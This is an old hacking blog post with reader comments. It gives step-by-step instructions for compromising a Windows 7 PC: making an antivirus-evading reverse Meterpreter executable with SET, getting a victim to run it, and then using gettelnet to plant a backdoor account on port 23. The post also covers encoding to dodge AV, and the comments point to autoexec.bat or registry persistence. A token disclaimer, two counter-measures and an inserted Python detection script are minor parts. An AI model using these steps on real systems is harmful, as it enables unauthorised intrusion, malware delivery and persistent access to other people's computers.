Friday 28 December 2012

Compromising a Windows 7 system with BackTrack 5 R3 and setting up telnet as a backdoor

Hello guys, today I am going to show you how to 'hack' into a Windows 7 PC using Metasploit as well as SET (Social Engineering Toolkit). You can follow the images for easy reference. This is my first post!



As you can see above, you can launch SET by going to Applications >> BackTrack >> Exploitation Tools >> Social Engineering Toolkit >> SET.
Then select option 1, Social-Engineering Attacks.





We are going to infect our victim with an 'executable payload'. It is the best way to attack, provided you keep your Metasploit framework updated. If your framework is not updated, you can run the following command in a terminal:

"msfupdate"

Type this command without the quotes. It may take a long time to update completely; if you are in a hurry, you can continue without updating. There is a drawback though: if you do not update, the executable file may be detected by antivirus software (my own experience).

Now, back to the topic:
Select option 4, Create a Payload and Listener.
If you are with me, you are good to go.


Now it asks for your IP. Open a new terminal and type:

"ifconfig"

Type it without the quotes. Depending on your connections there will be some interface names such as eth0, wlan0, etc. If you are using a WiFi connection (remember to set up port forwarding on your router for inbound and outbound connections) it is shown as wlan0, and for a wired LAN connection it should be eth0, I guess. Below your respective interface you can see "inet addr" followed by a number, which is your IP. Just copy and paste that number into SET when it prompts for one. Now get going.



There you go, I entered mine: 192.168.56.101 (behind a network).

Now it asks for your payload. For a Windows target it is always 'Windows Shell Reverse TCP' or 'Windows Reverse TCP Meterpreter'. I opt for number 2 as it is a great tool and better to use than the first one (trust me, the first one works but it is damn complicated!). Meterpreter is a really powerful tool which can do many things: key logging, screen capturing, uploading and downloading files, and almost anything else!



Look at the pic above; it is the encoding menu where you can select the encoding for your executable file. I recommend option 16 as it is widely used and is also ranked best. Encoding is just a way of transforming the file so that AV software may not recognise it, but unfortunately up-to-date antivirus products catch such encoded files too. But as far as I know, most people download antivirus software from torrents or Google and end up with counterfeit copies which cannot update themselves. So we have about a 70% success rate. Wait until the encoding process completes...


The process completed, and you can see the directory of our exe file (I have highlighted it in the image). The exe file is named 'msf.exe' by default. You can find it at File System >> pentest >> exploits >> set >> msf.exe. It is this file that you have to send to the victim or target; then start the listener by typing 'yes' when it asks for yes or no (look at the image above).






Here in the image is the directory and the msf.exe backdoor. Go on reading...



Yes, the listener is online and listening on port 443. Look at the picture below.






Our poor and unsuspecting target is launching our backdoor...


Hey, wait a minute, our listener has caught something interesting... guess what? METERPRETER SESSION 1 OPENED! That's it, we have successfully compromised the target's PC! Type the following command to see active sessions:

"sessions -i"

The active session ID for me is 1. To interact with session 1, type:

"sessions -i 1"


You are in the Meterpreter command line now! You can type

"help"

to get the list of Meterpreter commands. I typed "sysinfo" to show that an actual Windows 7 PC has been compromised :D
But if the victim reboots or shuts down his/her PC, you have to follow the whole process again. You wouldn't like that, right? Then type:

"run gettelnet -u [any username] -p [any password]"

See the image below. I have set jack as a user on the victim PC and the password is also jack. This opens port 23 ready for connection, and when you telnet to the victim (open a terminal and type "open [victim ip] 23") it asks for a username and password. Type jack in both fields and you are in again! (with fewer features)



ENJOY! I will soon be posting articles on Meterpreter commands and other flaws...


COUNTER-MEASURES:

1) Install a third-party firewall.
2) Never accept any file without scanning it first.
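One practical check to go with these counter-measures, as an added example that is not part of the original post: a Python script that scans the output of `netstat -ano` and `net user` from a Windows 7 box for the two traces the gettelnet step above leaves behind, a TCP listener on port 23 and a local account that was not there before. The sample outputs, the host name WIN7-LAB and the baseline account list are constructed assumptions, not data from the post.

```python
# Constructed sample of `netstat -ano` output from a Windows 7 host (not taken from the post).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING       1624
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    192.168.56.102:49160   192.168.56.101:443     ESTABLISHED     2284
  UDP    0.0.0.0:5355           *:*                                    1024
"""

# Constructed sample of `net user` output; 'jack' is the account the gettelnet step creates.
SAMPLE_NET_USER = """\
User accounts for \\\\WIN7-LAB

-------------------------------------------------------------------------------
Administrator            Guest                    alice
jack
The command completed successfully.
"""

BASELINE_ACCOUNTS = {"Administrator", "Guest", "alice"}  # accounts from a clean build (assumed)

def telnet_listeners(netstat_output):
    """Return (local_address, pid) for every TCP socket LISTENING on port 23 (no telnet server on a stock Win7)."""
    hits = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] != "TCP" or fields[3] != "LISTENING":
            continue  # header row, UDP rows (4 fields) and non-listening sockets are skipped
        local, pid = fields[1], fields[4]
        if local.rsplit(":", 1)[1] == "23":  # also handles IPv6 forms like [::]:23
            hits.append((local, int(pid)))
    return hits

def unexpected_accounts(net_user_output, baseline=BASELINE_ACCOUNTS):
    """Return local account names from `net user` output that are missing from the baseline."""
    names, in_table = [], False
    for line in net_user_output.splitlines():
        if line.startswith("----"):
            in_table = True  # the account table starts after the dashed rule
        elif line.startswith("The command completed"):
            break
        elif in_table:
            names.extend(line.split())
    return sorted(set(names) - set(baseline))

def assess(netstat_output, net_user_output):
    """Combine both checks into a list of readable findings (empty list means nothing found)."""
    findings = [f"telnet listener on {addr} (PID {pid})" for addr, pid in telnet_listeners(netstat_output)]
    findings += [f"account not in baseline: {name}" for name in unexpected_accounts(net_user_output)]
    return findings
```

Run `assess(SAMPLE_NETSTAT, SAMPLE_NET_USER)` to see both findings; on a real host feed it the saved output of the two commands.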

NOTE: I do not in any way support cyber crime, nor can I be held responsible in any way for how readers use this info. As you can see, I have worked this out in my own lab (LAN). I request that readers not use this for hacking into confidential computers and causing havoc. CONNECTING TO OTHER COMPUTERS CREATES LOG FILES ON THE REMOTE PC/SERVER, DEPENDING ON THE COMMAND YOU EXECUTED. AN EXPERT MAY BE ABLE TO ACCESS THOSE FILES AND REPORT THE IP LOG TO THE RESPECTIVE ISP, FINALLY PARKING YOU BEHIND BARS.


6 comments:

  1. Where will the backdoor be located on the Windows system?

    Replies
    1. It doesn't get located... and you gotta make it permanent by adding it to autoexec.bat or some registry tricks...

  2. I can't log in to the meterpreter session again with the open [ip] 23

    Replies
    1. Yes, it's terminated once you exit meterpreter... you need to configure a backdoor to stay connected... and you just tried to telnet him, and with no telnet server available online with the victim, that won't work... will post some articles on it... stay tuned

  3. Yeahhhh! Finally I get it :)
    Thanks a million for your tutorial <3